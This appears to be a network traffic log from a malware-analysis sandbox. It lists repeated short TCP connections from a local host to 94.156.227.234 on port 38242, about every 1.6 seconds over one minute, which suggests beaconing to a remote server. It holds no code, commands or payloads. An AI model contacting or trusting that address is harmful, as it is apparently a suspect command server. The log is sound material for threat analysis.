Dec 27, 2024 09:14:58.127872944 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:58.247432947 CET	38242	51366	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:58.247524023 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:58.247524023 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:58.367914915 CET	38242	51366	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:58.758120060 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:58.919003963 CET	38242	51366	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:59.450661898 CET	38242	51366	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:59.450737000 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:59.761553049 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:59.881339073 CET	38242	51368	94.156.227.234	192.168.2.14
Dec 27, 2024 09:14:59.881413937 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:14:59.881443024 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:00.001409054 CET	38242	51368	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:00.535407066 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:00.699032068 CET	38242	51368	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:01.038434982 CET	38242	51368	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:01.038542986 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:01.540991068 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:01.660532951 CET	38242	51370	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:01.660644054 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:01.661092997 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:01.782365084 CET	38242	51370	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:02.233824015 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:02.394968987 CET	38242	51370	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:02.784929037 CET	38242	51370	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:02.785028934 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:03.236274958 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:03.355915070 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:03.356079102 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:03.356080055 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:03.738852978 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:03.897695065 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:04.041587114 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:04.041603088 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:04.087049007 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:04.904330969 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:05.023914099 CET	38242	51374	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:05.024023056 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:05.024077892 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:05.109961987 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:05.110224009 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:05.144838095 CET	38242	51374	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:05.530483007 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:05.691092014 CET	38242	51374	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:06.204047918 CET	38242	51374	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:06.204197884 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:06.532088041 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:06.651746988 CET	38242	51376	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:06.651854992 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:06.651897907 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:06.771451950 CET	38242	51376	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:07.156631947 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:07.318903923 CET	38242	51376	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:07.833940983 CET	38242	51376	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:07.834073067 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:08.157308102 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:08.276865005 CET	38242	51378	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:08.276945114 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:08.277105093 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:08.396616936 CET	38242	51378	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:08.782855988 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:08.943012953 CET	38242	51378	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:09.442337036 CET	38242	51378	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:09.442440033 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:09.784035921 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:09.903518915 CET	38242	51380	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:09.903589964 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:09.903609991 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:10.023392916 CET	38242	51380	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:10.409049034 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:10.571075916 CET	38242	51380	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:11.058943987 CET	38242	51380	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:11.059169054 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:11.409868956 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:11.529423952 CET	38242	51382	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:11.529512882 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:11.529540062 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:11.649039030 CET	38242	51382	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:12.035099030 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:12.195034981 CET	38242	51382	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:12.660466909 CET	38242	51382	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:12.660574913 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:13.036082029 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:13.156475067 CET	38242	51384	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:13.156552076 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:13.156583071 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:13.276151896 CET	38242	51384	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:13.662098885 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:13.823000908 CET	38242	51384	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:14.309529066 CET	38242	51384	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:14.309621096 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:14.663253069 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:14.782835007 CET	38242	51386	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:14.782937050 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:14.783004045 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:14.902606964 CET	38242	51386	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:15.300034046 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:15.462958097 CET	38242	51386	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:15.979218006 CET	38242	51386	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:15.979325056 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:16.301179886 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:16.420694113 CET	38242	51388	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:16.420774937 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:16.420793056 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:16.540250063 CET	38242	51388	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:16.926290989 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:17.087002993 CET	38242	51388	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:17.607261896 CET	38242	51388	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:17.607331991 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:17.927480936 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:18.046981096 CET	38242	51390	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:18.047050953 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:18.047086954 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:18.166601896 CET	38242	51390	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:18.551848888 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:18.715068102 CET	38242	51390	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:19.207684994 CET	38242	51390	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:19.207757950 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:19.552721977 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:19.672266006 CET	38242	51392	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:19.672338009 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:19.672338009 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:19.791865110 CET	38242	51392	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:20.176502943 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:20.339097023 CET	38242	51392	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:20.874850988 CET	38242	51392	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:20.874922037 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:21.177241087 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:21.296828032 CET	38242	51394	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:21.296951056 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:21.297108889 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:21.416517019 CET	38242	51394	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:21.801146030 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:21.963042021 CET	38242	51394	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:22.413710117 CET	38242	51394	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:22.413778067 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:22.801868916 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:22.921456099 CET	38242	51396	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:22.921539068 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:22.921539068 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:23.041107893 CET	38242	51396	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:23.425858974 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:23.587064028 CET	38242	51396	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:24.220211029 CET	38242	51396	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:24.220294952 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:24.426606894 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:24.546164989 CET	38242	51398	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:24.546248913 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:24.546294928 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:24.665781975 CET	38242	51398	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:25.050735950 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:25.211236954 CET	38242	51398	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:25.786076069 CET	38242	51398	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:25.786211014 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:26.051471949 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:26.171011925 CET	38242	51400	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:26.171081066 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:26.171125889 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:26.290725946 CET	38242	51400	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:26.675059080 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:26.835019112 CET	38242	51400	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:27.391685009 CET	38242	51400	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:27.391792059 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:27.675920963 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:27.795531988 CET	38242	51402	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:27.795593023 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:27.795629978 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:27.915128946 CET	38242	51402	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:28.299649000 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:28.463159084 CET	38242	51402	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:28.987832069 CET	38242	51402	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:28.987936020 CET	51402	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:29.300399065 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:29.419971943 CET	38242	51404	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:29.420051098 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:29.420084953 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:29.539700985 CET	38242	51404	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:29.924108982 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:30.087097883 CET	38242	51404	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:30.561914921 CET	38242	51404	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:30.561990976 CET	51404	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:30.924823046 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:31.044336081 CET	38242	51406	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:31.044419050 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:31.044454098 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:31.163994074 CET	38242	51406	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:31.548979044 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:31.711103916 CET	38242	51406	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:32.242290974 CET	38242	51406	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:32.242408037 CET	51406	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:32.549783945 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:32.669475079 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:32.669586897 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:32.669609070 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:32.789241076 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:33.173568964 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:33.339173079 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:33.830446005 CET	38242	51408	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:33.830519915 CET	51408	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:34.174685001 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:34.294622898 CET	38242	51410	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:34.294706106 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:34.294883013 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:34.414418936 CET	38242	51410	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:34.798862934 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:34.963244915 CET	38242	51410	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:35.452099085 CET	38242	51410	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:35.452163935 CET	51410	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:35.799631119 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:35.919303894 CET	38242	51412	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:35.919379950 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:35.919426918 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:36.039021015 CET	38242	51412	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:36.422852039 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:36.587065935 CET	38242	51412	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:37.085129023 CET	38242	51412	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:37.085213900 CET	51412	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:37.423671961 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:37.543384075 CET	38242	51414	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:37.543456078 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:37.543638945 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:37.663249016 CET	38242	51414	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:38.048471928 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:38.211237907 CET	38242	51414	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:38.701993942 CET	38242	51414	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:38.702061892 CET	51414	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:39.049472094 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:39.169223070 CET	38242	51416	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:39.169327021 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:39.169367075 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:39.289412022 CET	38242	51416	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:39.675951004 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:39.839204073 CET	38242	51416	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:40.298760891 CET	38242	51416	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:40.298894882 CET	51416	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:40.677223921 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:40.797600031 CET	38242	51418	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:40.797669888 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:40.797774076 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:40.917473078 CET	38242	51418	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:41.302736998 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:41.467152119 CET	38242	51418	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:41.938395023 CET	38242	51418	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:41.938483953 CET	51418	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:42.303572893 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:42.423275948 CET	38242	51420	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:42.423549891 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:42.423774004 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:42.544315100 CET	38242	51420	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:42.928112984 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:43.091242075 CET	38242	51420	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:43.595345974 CET	38242	51420	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:43.595464945 CET	51420	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:43.929227114 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:44.048966885 CET	38242	51422	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:44.049097061 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:44.049449921 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:44.169198036 CET	38242	51422	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:44.554868937 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:44.715261936 CET	38242	51422	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:45.211760998 CET	38242	51422	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:45.211850882 CET	51422	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:45.556013107 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:45.675705910 CET	38242	51424	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:45.675789118 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:45.676064968 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:45.795566082 CET	38242	51424	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:46.182063103 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:46.343293905 CET	38242	51424	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:46.835686922 CET	38242	51424	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:46.835767031 CET	51424	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:47.183195114 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:47.302936077 CET	38242	51426	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:47.303071022 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:47.303100109 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:47.422776937 CET	38242	51426	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:47.807497025 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:47.967098951 CET	38242	51426	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:48.459683895 CET	38242	51426	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:48.459836960 CET	51426	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:48.808305979 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:48.928175926 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:48.928272009 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:48.928356886 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:49.047962904 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:49.432857990 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:49.595187902 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:50.099865913 CET	38242	51428	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:50.099973917 CET	51428	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:50.433912039 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:50.553536892 CET	38242	51430	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:50.553663969 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:50.553745031 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:50.673285961 CET	38242	51430	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:51.060055971 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:51.223155022 CET	38242	51430	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:51.780194998 CET	38242	51430	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:51.780585051 CET	51430	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:52.061429977 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:52.181116104 CET	38242	51432	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:52.181256056 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:52.181490898 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:52.301418066 CET	38242	51432	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:52.688879013 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:52.851974010 CET	38242	51432	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:53.321578979 CET	38242	51432	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:53.321650982 CET	51432	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:53.690404892 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:53.810009956 CET	38242	51434	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:53.810154915 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:53.810394049 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:53.930054903 CET	38242	51434	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:54.316386938 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:54.479302883 CET	38242	51434	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:55.041949034 CET	38242	51434	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:55.042073011 CET	51434	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:55.317819118 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:55.722259045 CET	38242	51436	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:55.722313881 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:55.722482920 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:55.842050076 CET	38242	51436	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:56.228636026 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:56.391175032 CET	38242	51436	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:56.899569035 CET	38242	51436	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:56.899689913 CET	51436	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:57.229902983 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:57.349652052 CET	38242	51438	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:57.350009918 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:57.350009918 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:57.469535112 CET	38242	51438	94.156.227.234	192.168.2.14
Dec 27, 2024 09:15:57.854866982 CET	51438	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:15:58.015331030 CET	38242	51438	94.156.227.234	192.168.2.14
